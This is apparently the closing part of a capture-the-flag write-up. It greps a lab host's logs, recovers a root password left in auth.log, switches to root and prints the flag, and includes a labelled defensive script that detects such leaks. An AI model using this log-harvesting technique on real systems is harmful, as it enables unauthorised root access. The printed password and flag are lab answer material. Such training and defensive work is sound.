./kern.log:608:2025-02-03T09:46:09.599364+01:00 hit kernel: [ 0.022678] Speculative Store Bypass: Vulnerable
./kern.log:786:2025-02-03T09:46:09.599495+01:00 hit kernel: [ 0.368569] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:820:2025-02-03T09:46:09.599518+01:00 hit kernel: [ 0.395226] ima: No TPM chip found, activating TPM-bypass!
./kern.log:839:2025-02-03T09:46:09.599569+01:00 hit kernel: [ 0.488888] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:959:2025-02-03T09:46:09.611099+01:00 hit kernel: [ 2.481281] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:1060:2025-02-03T09:59:59.616124+01:00 hit kernel: [ 0.005559] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:1097:2025-02-03T09:59:59.616181+01:00 hit kernel: [ 0.023292] Speculative Store Bypass: Vulnerable
./kern.log:1275:2025-02-03T09:59:59.616312+01:00 hit kernel: [ 0.381849] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:1309:2025-02-03T09:59:59.616374+01:00 hit kernel: [ 0.409570] ima: No TPM chip found, activating TPM-bypass!
./kern.log:1328:2025-02-03T09:59:59.616425+01:00 hit kernel: [ 0.505048] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:1448:2025-02-03T09:59:59.675470+01:00 hit kernel: [ 2.556606] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:1549:2025-02-03T10:14:31.844599+01:00 hit kernel: [ 0.005365] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:1586:2025-02-03T10:14:31.844656+01:00 hit kernel: [ 0.022731] Speculative Store Bypass: Vulnerable
./kern.log:1764:2025-02-03T10:14:31.844787+01:00 hit kernel: [ 0.376414] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:1798:2025-02-03T10:14:31.844808+01:00 hit kernel: [ 0.402553] ima: No TPM chip found, activating TPM-bypass!
./kern.log:1817:2025-02-03T10:14:31.844897+01:00 hit kernel: [ 0.495626] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:1937:2025-02-03T10:14:31.857964+01:00 hit kernel: [ 2.735579] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:2038:2025-02-03T15:43:33.663469+01:00 hit kernel: [ 0.005697] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:2075:2025-02-03T15:43:33.663526+01:00 hit kernel: [ 0.023053] Speculative Store Bypass: Vulnerable
./kern.log:2253:2025-02-03T15:43:33.663844+01:00 hit kernel: [ 0.377040] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:2287:2025-02-03T15:43:33.663937+01:00 hit kernel: [ 0.403737] ima: No TPM chip found, activating TPM-bypass!
./kern.log:2306:2025-02-03T15:43:33.663988+01:00 hit kernel: [ 0.498750] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:2426:2025-02-03T15:43:33.732181+01:00 hit kernel: [ 2.610661] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:2527:2025-02-03T23:04:13.749425+01:00 hit kernel: [ 0.005471] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:2564:2025-02-03T23:04:13.749482+01:00 hit kernel: [ 0.022848] Speculative Store Bypass: Vulnerable
./kern.log:2742:2025-02-03T23:04:13.749665+01:00 hit kernel: [ 0.470047] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:2776:2025-02-03T23:04:13.749686+01:00 hit kernel: [ 0.498369] ima: No TPM chip found, activating TPM-bypass!
./kern.log:2795:2025-02-03T23:04:13.749737+01:00 hit kernel: [ 0.593455] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:2915:2025-02-03T23:04:13.819111+01:00 hit kernel: [ 2.788234] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:3016:2025-02-03T23:15:51.823614+01:00 hit kernel: [ 0.005467] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:3053:2025-02-03T23:15:51.823672+01:00 hit kernel: [ 0.024177] Speculative Store Bypass: Vulnerable
./kern.log:3231:2025-02-03T23:15:51.823803+01:00 hit kernel: [ 0.408691] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:3265:2025-02-03T23:15:51.823824+01:00 hit kernel: [ 0.436782] ima: No TPM chip found, activating TPM-bypass!
./kern.log:3284:2025-02-03T23:15:51.823875+01:00 hit kernel: [ 0.533063] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:3404:2025-02-03T23:15:51.836953+01:00 hit kernel: [ 2.745818] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:3505:2025-02-03T23:21:56.666268+01:00 hit kernel: [ 0.005415] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:3542:2025-02-03T23:21:56.666325+01:00 hit kernel: [ 0.022919] Speculative Store Bypass: Vulnerable
./kern.log:3720:2025-02-03T23:21:56.666457+01:00 hit kernel: [ 0.399963] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:3754:2025-02-03T23:21:56.666478+01:00 hit kernel: [ 0.427440] ima: No TPM chip found, activating TPM-bypass!
./kern.log:3773:2025-02-03T23:21:56.666530+01:00 hit kernel: [ 0.523287] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:3893:2025-02-03T23:21:56.666684+01:00 hit kernel: [ 2.567433] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:3994:2025-02-03T23:36:20.545146+01:00 hit kernel: [ 0.005477] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:4031:2025-02-03T23:36:20.545201+01:00 hit kernel: [ 0.022787] Speculative Store Bypass: Vulnerable
./kern.log:4209:2025-02-03T23:36:20.545328+01:00 hit kernel: [ 0.373341] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:4243:2025-02-03T23:36:20.545349+01:00 hit kernel: [ 0.399029] ima: No TPM chip found, activating TPM-bypass!
./kern.log:4262:2025-02-03T23:36:20.545434+01:00 hit kernel: [ 0.492292] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:4382:2025-02-03T23:36:20.563894+01:00 hit kernel: [ 2.436214] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:4483:2025-02-03T23:40:14.702804+01:00 hit kernel: [ 0.005297] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:4520:2025-02-03T23:40:14.702861+01:00 hit kernel: [ 0.022499] Speculative Store Bypass: Vulnerable
./kern.log:4698:2025-02-03T23:40:14.702987+01:00 hit kernel: [ 0.373482] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:4732:2025-02-03T23:40:14.703008+01:00 hit kernel: [ 0.399198] ima: No TPM chip found, activating TPM-bypass!
./kern.log:4751:2025-02-03T23:40:14.703056+01:00 hit kernel: [ 0.492033] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:4871:2025-02-03T23:40:14.735979+01:00 hit kernel: [ 2.610698] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:4972:2025-02-03T23:47:43.609414+01:00 hit kernel: [ 0.005325] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:5009:2025-02-03T23:47:43.609470+01:00 hit kernel: [ 0.022364] Speculative Store Bypass: Vulnerable
./kern.log:5187:2025-02-03T23:47:43.609623+01:00 hit kernel: [ 0.370600] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:5221:2025-02-03T23:47:43.609645+01:00 hit kernel: [ 0.396510] ima: No TPM chip found, activating TPM-bypass!
./kern.log:5240:2025-02-03T23:47:43.609877+01:00 hit kernel: [ 0.489828] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:5360:2025-02-03T23:47:43.650479+01:00 hit kernel: [ 2.522706] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:5462:2025-02-04T16:04:11.842605+01:00 hit kernel: [ 0.013207] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:5497:2025-02-04T16:04:11.842704+01:00 hit kernel: [ 0.121905] Speculative Store Bypass: Vulnerable
./kern.log:5670:2025-02-04T16:04:11.843240+01:00 hit kernel: [ 1.298821] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:5704:2025-02-04T16:04:11.843304+01:00 hit kernel: [ 1.370026] ima: No TPM chip found, activating TPM-bypass!
./kern.log:5723:2025-02-04T16:04:11.843371+01:00 hit kernel: [ 1.466810] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:5842:2025-02-04T16:04:12.013910+01:00 hit kernel: [ 4.822390] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
grep: ./btmp: Permiso denegado
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@a0742b1a5f354a49a8e5e976590acc0d-0000000000000dd2-00062d2f519cbec6.journal: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00060a2d81869ff7-950cb9ae29ceea68.journal~: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00062d44129755a7-2bb01093fe79ff6a.journal~: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/user-1000.journal: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00060a2dabf64898-333fc89e8bd4ec01.journal~: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00062d3786ca6845-442dade4fab6d7c6.journal~: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system.journal: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00062d2f519e07d7-b0bbe5cef5db6c97.journal~: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00062d52523f2e2a-7ce3e570a7837216.journal~: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00060a2df63aad18-0f29f983d6f5561b.journal~: coincidencia en fichero binario
./syslog:82:2025-02-03T09:45:46.607149+01:00 hit kernel: [ 0.005276] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./syslog:119:2025-02-03T09:45:46.607203+01:00 hit kernel: [ 0.022514] Speculative Store Bypass: Vulnerable
./syslog:297:2025-02-03T09:45:46.607334+01:00 hit kernel: [ 0.370923] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./syslog:331:2025-02-03T09:45:46.607354+01:00 hit kernel: [ 0.396807] ima: No TPM chip found, activating TPM-bypass!
./syslog:350:2025-02-03T09:45:46.607417+01:00 hit kernel: [ 0.489648] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./syslog:470:2025-02-03T09:45:46.607532+01:00 hit kernel: [ 2.420236] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./syslog:680:2025-02-03T09:46:09.599307+01:00 hit kernel: [ 0.005428] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./syslog:717:2025-02-03T09:46:09.599364+01:00 hit kernel: [ 0.022678] Speculative Store Bypass: Vulnerable
./syslog:895:2025-02-03T09:46:09.599495+01:00 hit kernel: [ 0.368569] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./syslog:929:2025-02-03T09:46:09.599518+01:00 hit kernel: [ 0.395226] ima: No TPM chip found, activating TPM-bypass!
./syslog:948:2025-02-03T09:46:09.599569+01:00 hit kernel: [ 0.488888] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./syslog:1068:2025-02-03T09:46:09.611099+01:00 hit kernel: [ 2.481281] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./syslog:1521:2025-02-03T09:59:59.616124+01:00 hit kernel: [ 0.005559] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./syslog:1558:2025-02-03T09:59:59.616181+01:00 hit kernel: [ 0.023292] Speculative Store Bypass: Vulnerable
./syslog:1736:2025-02-03T09:59:59.616312+01:00 hit kernel: [ 0.381849] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./syslog:1770:2025-02-03T09:59:59.616374+01:00 hit kernel: [ 0.409570] ima: No TPM chip found, activating TPM-bypass!
./syslog:1789:2025-02-03T09:59:59.616425+01:00 hit kernel: [ 0.505048] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./syslog:1973:2025-02-03T09:59:59.675470+01:00 hit kernel: [ 2.556606] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./syslog:2344:2025-02-03T10:14:31.844599+01:00 hit kernel: [ 0.005365] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./syslog:2381:2025-02-03T10:14:31.844656+01:00 hit kernel: [ 0.022731] Speculative Store Bypass: Vulnerable
./syslog:2559:2025-02-03T10:14:31.844787+01:00 hit kernel: [ 0.376414] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./syslog:2593:2025-02-03T10:14:31.844808+01:00 hit kernel: [ 0.402553] ima: No TPM chip found, activating TPM-bypass!
./syslog:2612:2025-02-03T10:14:31.844897+01:00 hit kernel: [ 0.495626] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./syslog:2785:2025-02-03T10:14:31.857964+01:00 hit kernel: [ 2.735579] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
grep: ./syslog: coincidencia en fichero binario
./dpkg.log:2:2023-11-15 08:56:11 install base-passwd:amd64 <none> 3.6.1
./dpkg.log:3:2023-11-15 08:56:11 status half-installed base-passwd:amd64 3.6.1
./dpkg.log:4:2023-11-15 08:56:12 status unpacked base-passwd:amd64 3.6.1
./dpkg.log:5:2023-11-15 08:56:12 configure base-passwd:amd64 3.6.1 3.6.1
./dpkg.log:6:2023-11-15 08:56:12 status half-configured base-passwd:amd64 3.6.1
./dpkg.log:7:2023-11-15 08:56:12 status installed base-passwd:amd64 3.6.1
./dpkg.log:169:2023-11-15 08:56:17 upgrade base-passwd:amd64 3.6.1 3.6.1
./dpkg.log:170:2023-11-15 08:56:17 status half-configured base-passwd:amd64 3.6.1
./dpkg.log:171:2023-11-15 08:56:17 status unpacked base-passwd:amd64 3.6.1
./dpkg.log:172:2023-11-15 08:56:17 status half-installed base-passwd:amd64 3.6.1
./dpkg.log:173:2023-11-15 08:56:17 status unpacked base-passwd:amd64 3.6.1
./dpkg.log:283:2023-11-15 08:56:19 install passwd:amd64 <none> 1:4.13+dfsg1-1+b1
./dpkg.log:284:2023-11-15 08:56:19 status half-installed passwd:amd64 1:4.13+dfsg1-1+b1
./dpkg.log:285:2023-11-15 08:56:19 status unpacked passwd:amd64 1:4.13+dfsg1-1+b1
./dpkg.log:613:2023-11-15 08:56:22 configure base-passwd:amd64 3.6.1 <none>
./dpkg.log:614:2023-11-15 08:56:22 status unpacked base-passwd:amd64 3.6.1
./dpkg.log:615:2023-11-15 08:56:22 status half-configured base-passwd:amd64 3.6.1
./dpkg.log:616:2023-11-15 08:56:22 status installed base-passwd:amd64 3.6.1
./dpkg.log:665:2023-11-15 08:56:22 configure passwd:amd64 1:4.13+dfsg1-1+b1 <none>
./dpkg.log:666:2023-11-15 08:56:22 status unpacked passwd:amd64 1:4.13+dfsg1-1+b1
./dpkg.log:667:2023-11-15 08:56:22 status half-configured passwd:amd64 1:4.13+dfsg1-1+b1
./dpkg.log:668:2023-11-15 08:56:22 status installed passwd:amd64 1:4.13+dfsg1-1+b1
grep: ./installer/cdebconf/templates.dat: Permiso denegado
grep: ./installer/cdebconf/questions.dat: Permiso denegado
grep: ./installer/Xorg.0.log: Permiso denegado
grep: ./installer/syslog: Permiso denegado
./installer/status:1912:Description: Set up users and passwords
grep: ./installer/partman: Permiso denegado
./installer/hardware-summary:130:/proc/cpuinfo: bugs : spectre_v1 spectre_v2 spec_store_bypass swapgs taa itlb_multihit srbds mmio_stale_data retbleed gds
grep: ./private: Permiso denegado

In ./auth.log we find the password used in an earlier login: r00tP4zzw0rd
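
A defender-side check for the kind of leak used above, added here as an illustration and not part of the original walkthrough: it scans sshd "invalid user" entries in an auth.log for names that look like mistyped passwords, so the credential can be rotated before anyone greps for it. The log lines are constructed samples and the length/character-class thresholds are assumptions.

```python
import re

# Constructed sample auth.log lines (not from the page); two of them show a
# password typed into the username field, which sshd then records verbatim.
SAMPLE_AUTH_LOG = """\
2025-02-03T09:50:01+01:00 hit sshd[812]: Invalid user charlie from 192.0.2.10 port 50122
2025-02-03T09:50:05+01:00 hit sshd[812]: Failed password for invalid user Sup3r$ecret!23 from 192.0.2.10 port 50122 ssh2
2025-02-03T09:50:09+01:00 hit sshd[815]: Accepted password for charlie from 192.0.2.10 port 50130 ssh2
2025-02-03T09:51:12+01:00 hit sshd[820]: Invalid user admin from 198.51.100.7 port 41000
2025-02-03T09:52:30+01:00 hit sshd[823]: Invalid user r00tP4zzw0rd from 192.0.2.10 port 50140
"""

# sshd lines that carry an unauthenticated "invalid user" name.
INVALID_USER_RE = re.compile(
    r"sshd\[\d+\]: (?:Failed password for invalid user|Invalid user) (\S+) from (\S+)"
)
# Portable POSIX user names: lowercase, digits, '_' and '-', no leading digit.
PORTABLE_USER_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}\$?$")


def char_classes(s: str) -> int:
    """Count how many of lower/upper/digit/symbol classes appear in s."""
    return sum(
        any(pred(c) for c in s)
        for pred in (str.islower, str.isupper, str.isdigit, lambda c: not c.isalnum())
    )


def looks_like_password(name: str) -> bool:
    """Heuristic (assumed thresholds): a non-portable name of 8+ chars mixing 3+ classes."""
    return (
        not PORTABLE_USER_RE.match(name)
        and len(name) >= 8
        and char_classes(name) >= 3
    )


def find_leaked_credentials(log_text: str) -> list[tuple[int, str, str]]:
    """Return (line number, suspect string, source) for password-like invalid users."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = INVALID_USER_RE.search(line)
        if m and looks_like_password(m.group(1)):
            hits.append((lineno, m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    for lineno, secret, src in find_leaked_credentials(SAMPLE_AUTH_LOG):
        # Redact on output: the operator needs the line number, not the secret.
        print(f"line {lineno}: password-like user name from {src}: {secret[:2]}***")
```

Feed a real file with `find_leaked_credentials(open("/var/log/auth.log").read())`. On Debian, auth.log is written as root:adm mode 0640, so the fact that an unprivileged shell could read it here is itself a finding worth fixing.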

Try switching to root

Read root.txt

BASH
charlie@hit:/var/log$ su root
Contraseña:
root@hit:/var/log# id
uid=0(root) gid=0(root) grupos=0(root)
root@hit:/var/log# cat /root/root.txt
f4b9848754562bfeffbeb8cc8257048c